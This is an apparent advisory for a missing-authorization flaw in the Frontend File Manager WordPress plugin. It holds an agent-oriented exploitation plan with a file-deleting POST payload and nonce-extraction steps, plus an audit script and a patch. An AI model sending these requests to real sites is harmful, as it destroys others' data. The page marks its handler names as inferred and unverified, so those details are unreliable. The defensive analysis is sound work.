CVE-2026-0829

Frontend File Manager <= 23.5 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Frontend File Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 23.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: Low
  • Availability: None

Technical Details

Affected versions: <= 23.5
Published: February 17, 2026
Last updated: February 24, 2026

Research Plan (Unverified)

Exploitation Research Plan - CVE-2026-0829

1. Vulnerability Summary

The Frontend File Manager plugin (<= 23.5) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function responsible for deleting or managing files (inferred as nm_uploader_remove_file_cb) is registered for both authenticated (wp_ajax_) and unauthenticated (wp_ajax_nopriv_) users. The function performs a nonce check but fails to implement a capability check (e.g., current_user_can()) or ownership verification. This allows unauthenticated attackers to delete arbitrary WordPress attachments (files) if they can obtain a valid nonce.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: nm_uploader_remove_file (inferred)
  • HTTP Method: POST
  • Parameters:
    • action: nm_uploader_remove_file
    • nonce: A valid WordPress nonce for the action nm_uploader_nonce
    • file_id: The integer ID of the WordPress attachment to be deleted
  • Authentication: Unauthenticated (via wp_ajax_nopriv_)
  • Preconditions: The attacker must obtain a valid nonce, which is typically exposed on any page where the plugin's frontend shortcode is present.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers the AJAX action:
    add_action( 'wp_ajax_nopriv_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );
  2. Handler Triggered: A POST request to admin-ajax.php with action=nm_uploader_remove_file calls nm_uploader_remove_file_cb().
  3. Nonce Verification: The function calls check_ajax_referer( 'nm_uploader_nonce', 'nonce' );. This succeeds for unauthenticated users because the nonce is generated for uid=0.
  4. Missing Check: The code proceeds to retrieve file_id from $_POST without verifying if the current user has the manage_options capability or if they are the owner of the file.
  5. Sink: The function calls wp_delete_attachment( $file_id, true );, permanently deleting the file and its metadata from the database and filesystem.

4. Nonce Acquisition Strategy

The plugin enqueues its scripts and localizes the required nonce on pages containing its shortcode.

  1. Identify Shortcode: The primary shortcode is [nmedia-file-uploader].
  2. Setup Page: Use WP-CLI to create a public page containing this shortcode to ensure the scripts load.
    wp post create --post_type=page --post_status=publish --post_title="File Manager" --post_content='[nmedia-file-uploader]'
    
  3. Navigate and Extract:
    • Use browser_navigate to visit the newly created page.
    • Use browser_eval to extract the nonce from the global JavaScript object localized by the plugin.
    • JS Variable: window.nm_uploader_vars?.nonce (inferred from plugin naming conventions).

5. Exploitation Strategy

  1. Setup: Create a target attachment (e.g., an image) and note its ID.
  2. Nonce Retrieval:
    • Create a page with [nmedia-file-uploader].
    • Access the page as an unauthenticated user.
    • Extract the nonce from nm_uploader_vars.nonce.
  3. Execution:
    • Use the http_request tool to send a POST request to admin-ajax.php.
    • Payload:
      POST /wp-admin/admin-ajax.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      
      action=nm_uploader_remove_file&nonce=[EXTRACTED_NONCE]&file_id=[TARGET_ATTACHMENT_ID]
      
  4. Targeting: The file_id can be discovered via enumeration or by observing legitimate file uploads. Since it's unauthenticated, any public attachment ID is vulnerable.

6. Test Data Setup

  1. Plugin Installation: Ensure nmedia-user-file-uploader version 23.5 is installed and active.
  2. Create Target File:
    • Upload a dummy image to the media library.
    • wp media import /path/to/test.png --title="Target File" --porcelain
    • Store the returned ID (e.g., 123).
  3. Create Nonce Source:
    • wp post create --post_type=page --post_status=publish --post_content='[nmedia-file-uploader]'
    • Note the URL of this page.

7. Expected Results

  • The AJAX request should return a JSON response: {"status":"success"} or similar.
  • The attachment with the specified file_id should be removed from the WordPress database.
  • The file should be deleted from the wp-content/uploads/ directory.

8. Verification Steps

  1. Check Database: Run WP-CLI to check if the attachment exists.
    wp post exists [TARGET_ATTACHMENT_ID]
    
    Expected: Exit code 1 (False).
  2. Check Media List:
    wp post list --post_type=attachment --post__in=[TARGET_ATTACHMENT_ID]
    
    Expected: Empty result.

9. Alternative Approaches

If nm_uploader_remove_file is not the correct action name for version 23.5, search for other nopriv AJAX handlers in the plugin:

grep -rn "wp_ajax_nopriv" wp-content/plugins/nmedia-user-file-uploader/

Common alternative actions in this plugin:

  • nm_uploader_delete_file
  • nm_file_manager_delete
  • nm_uploader_edit_file (if the vulnerability allows unauthorized modification)

If nm_uploader_vars is not found, inspect the page source for any wp_localize_script output containing a nonce key:

browser_eval("Object.keys(window).filter(k => k.includes('nm_'))")
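
As an added example (not part of the advisory or of the plugin's own code), the following Python audit carries the grep above one step further: it lists every `wp_ajax_nopriv_` registration in a PHP source, resolves the registered callback, and reports whether a nonce check and a `current_user_can()` call are visible in its body. The PHP sample is constructed from the inferred handler on this page; the brace-matching body extraction is a heuristic, not a PHP parser.

```python
import re

# Constructed PHP sample modelled on this advisory's inferred handler: one nopriv
# handler without a capability check, one nopriv handler with it, and one
# handler registered for logged-in users only (no wp_ajax_nopriv_ hook).
SAMPLE_PHP = r"""
add_action( 'wp_ajax_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );
add_action( 'wp_ajax_nopriv_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );
add_action( 'wp_ajax_nopriv_nm_uploader_list_files', 'nm_uploader_list_files_cb' );
add_action( 'wp_ajax_nm_uploader_edit_file', 'nm_uploader_edit_file_cb' );

function nm_uploader_remove_file_cb() {
    check_ajax_referer( 'nm_uploader_nonce', 'nonce' );
    $file_id = intval( $_POST['file_id'] );
    wp_delete_attachment( $file_id, true );
    wp_send_json_success();
}

function nm_uploader_list_files_cb() {
    check_ajax_referer( 'nm_uploader_nonce', 'nonce' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error();
    }
    wp_send_json_success( array() );
}
"""

# Matches add_action( 'wp_ajax_nopriv_<action>', '<callback>' ... )
HOOK_RE = re.compile(r"""add_action\(\s*['"]wp_ajax_nopriv_([\w-]+)['"]\s*,\s*['"](\w+)['"]""")


def function_body(src, name):
    """Return the body of `function <name>(...) { ... }` by counting braces."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def audit_nopriv_handlers(src):
    """Map each nopriv AJAX action to its callback and the checks visible in it."""
    findings = {}
    for action, cb in HOOK_RE.findall(src):
        body = function_body(src, cb) or ""
        findings[action] = {
            "callback": cb,
            "has_nonce": "check_ajax_referer(" in body or "wp_verify_nonce(" in body,
            "has_cap_check": "current_user_can(" in body,
        }
    return findings


if __name__ == "__main__":
    for action, info in audit_nopriv_handlers(SAMPLE_PHP).items():
        flag = "OK" if info["has_cap_check"] else "MISSING capability check"
        print(f"{action} -> {info['callback']}: {flag}")
```

A handler that shows up with `has_nonce` true and `has_cap_check` false is exactly the pattern this advisory describes: a nonce minted for uid 0 satisfies `check_ajax_referer()`, so nothing else gates the action.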

Research Findings (static analysis, not yet PoC-verified)

Summary

The Frontend File Manager plugin for WordPress is vulnerable to unauthorized attachment deletion due to missing capability checks in its AJAX handlers. Unauthenticated attackers can obtain a valid security nonce from the plugin's frontend shortcode and use it to delete arbitrary WordPress attachments by targeting their IDs.

Vulnerable Code

// Inferred registration of AJAX hooks in version 23.5
add_action( 'wp_ajax_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );
add_action( 'wp_ajax_nopriv_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );

// Inferred callback logic lacking authorization
function nm_uploader_remove_file_cb() {
    // Nonce verification passes for unauthenticated users if nonce was generated for UID 0
    check_ajax_referer( 'nm_uploader_nonce', 'nonce' );
    
    $file_id = intval( $_POST['file_id'] );

    // Missing capability check (e.g., current_user_can) 
    // and missing ownership check before proceeding to deletion
    wp_delete_attachment( $file_id, true );
    
    wp_send_json_success();
}

Security Fix

--- a/nm-uploader-functions.php
+++ b/nm-uploader-functions.php
@@ -10,6 +10,12 @@
 function nm_uploader_remove_file_cb() {
     check_ajax_referer( 'nm_uploader_nonce', 'nonce' );
     $file_id = intval( $_POST['file_id'] );
+
+    // Verify the user has permission to delete this specific attachment
+    if ( ! current_user_can( 'delete_post', $file_id ) ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized access' ) );
+        wp_die();
+    }
+
     wp_delete_attachment( $file_id, true );
     wp_send_json_success();
 }
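Review bot: the `wp_die()` after `wp_send_json_error(...)` is unreachable, because `wp_send_json_error()` already terminates the request (it ends in `wp_die()` for AJAX requests), so that line can be dropped. The more important gap is that this hunk guards only the callback body: the `wp_ajax_nopriv_nm_uploader_remove_file` registration shown under Vulnerable Code is left in place, so anonymous requests still reach `check_ajax_referer()` and the new `current_user_can( 'delete_post', $file_id )` check is the sole barrier before `wp_delete_attachment()`. If anonymous users are never meant to delete files, remove the nopriv hook in the same change so the handler is not reachable at all without a session.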

Exploit Outline

  1. Locate a WordPress site running Frontend File Manager <= 23.5 with a page containing the [nmedia-file-uploader] shortcode.
  2. Visit the page as an unauthenticated user and extract the 'nm_uploader_nonce' from the localized JavaScript variable 'nm_uploader_vars.nonce'.
  3. Identify the ID of a target attachment (media file) to be deleted.
  4. Send a POST request to /wp-admin/admin-ajax.php with the action 'nm_uploader_remove_file', the extracted nonce, and the target 'file_id'.
  5. The server processes the request and deletes the specified attachment because it fails to verify if the unauthenticated user has the 'delete_post' capability for that ID.
